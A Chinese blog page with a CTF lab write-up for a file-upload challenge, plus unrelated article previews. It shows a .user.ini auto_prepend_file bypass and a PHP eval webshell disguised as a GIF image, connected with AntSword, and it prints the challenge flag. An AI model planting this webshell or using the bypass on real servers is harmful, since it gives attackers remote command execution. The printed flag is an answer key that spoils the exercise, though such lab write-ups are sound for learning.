news 2026/4/16 13:45:58

青少年CTF练习平台~Upload3

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
青少年CTF练习平台~Upload3

目录

    • 题目链接
    • 一、题目介绍
    • 二、上传.user.ini文件
    • 三、上传图片马(shell.png)
    • 四、访问首页文件
    • 五、连接蚁剑

题目链接

https://www.qsnctf.com/

一、题目介绍

这次我学聪明啦!老板说要对上传点进行php的大小写过滤!这下看你怎么办!

二、上传.user.ini文件

auto_prepend_file=shell.png


上传成功

三、上传图片马(shell.png)

GIF89a<?php @eval($_POST['cmd']);?>

上传成功

四、访问首页文件

当访问 index.php 时,PHP 引擎启动,读取目录下的 .user.ini,发现配置要求先加载 sell.png,于是它会先执行 shell.png 里的恶意代码,再执行首页原本的代码。

五、连接蚁剑

启动蚁剑连接shell(pass:cmd)

http://challenge.qsnctf.com:33578/index.php


连接成功

flag在根目录

flag{8ebfefb382d94eed9e1ef57e401492e7}

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/16 11:57:31

5D影院带来的视觉震撼与娱乐投资价值分析以及球幕影院设备价格揭秘

5D影院&#xff1a;技术革新带来的视听震撼新体验 5D影院通过结合视觉、听觉和触觉等多种感官体验&#xff0c;创造出一种前所未有的沉浸式观影环境。观众不仅可以欣赏到3D影像&#xff0c;还会感受到风、水、光影等真实的互动效果&#xff0c;使得影片情节更加生动。这种技术革…

作者头像 李华
网站建设 2026/4/16 10:26:30

无线网络仿真:蜂窝网络仿真_(9).蜂窝网络中的干扰管理与优化

蜂窝网络中的干扰管理与优化 干扰的基本概念 在蜂窝网络中&#xff0c;干扰是影响通信质量的重要因素之一。干扰可以分为多种类型&#xff0c;包括同频干扰、邻频干扰、多径干扰和外部干扰等。同频干扰是指在同一频率上多个用户或基站同时传输数据时产生的干扰&#xff1b;邻频…

作者头像 李华
网站建设 2026/4/16 10:27:02

ssm685教师科研项目信息资源管理系统vue

目录项目背景技术架构核心功能创新点应用价值开发技术源码文档获取/同行可拿货,招校园代理 &#xff1a;文章底部获取博主联系方式&#xff01;项目背景 随着高校科研管理信息化需求的增长&#xff0c;传统人工管理方式效率低下且易出错。SSM685教师科研项目信息资源管理系统基…

作者头像 李华
网站建设 2026/4/16 10:25:46

ssm695新型药物临床药品治疗方案信息管理系系统vue

目录项目背景技术架构核心功能模块创新点应用价值开发技术源码文档获取/同行可拿货,招校园代理 &#xff1a;文章底部获取博主联系方式&#xff01;项目背景 SSM695新型药物临床药品治疗方案信息管理系统基于Vue.js前端框架与SpringSpringMVCMyBatis&#xff08;SSM&#xff0…

作者头像 李华
网站建设 2026/4/16 10:25:26

交通仿真软件:VISSIM_(11).微观交通仿真原理

微观交通仿真原理 在交通仿真软件中&#xff0c;微观交通仿真是指对交通系统中的个体&#xff08;如车辆、行人等&#xff09;进行详细建模和仿真&#xff0c;以反映交通流在时间和空间上的动态变化。微观交通仿真通常涉及车辆的运动、驾驶行为、交通控制设施、交通网络的几何特…

作者头像 李华
网站建设 2026/4/16 10:26:37

警惕MacStealer恶意软件:黑客借虚假ChatGPT指令传播

网络攻击警告&#xff1a;MacStealer恶意软件通过虚假ChatGPT指令传播 安全研究人员发现&#xff0c;攻击者正在利用ChatGPT来诱骗Mac用户将一行命令行粘贴到终端中&#xff0c;从而安装恶意软件。具体来说&#xff0c;安装的是MacStealer木马&#xff0c;该木马能让攻击者获取…

作者头像 李华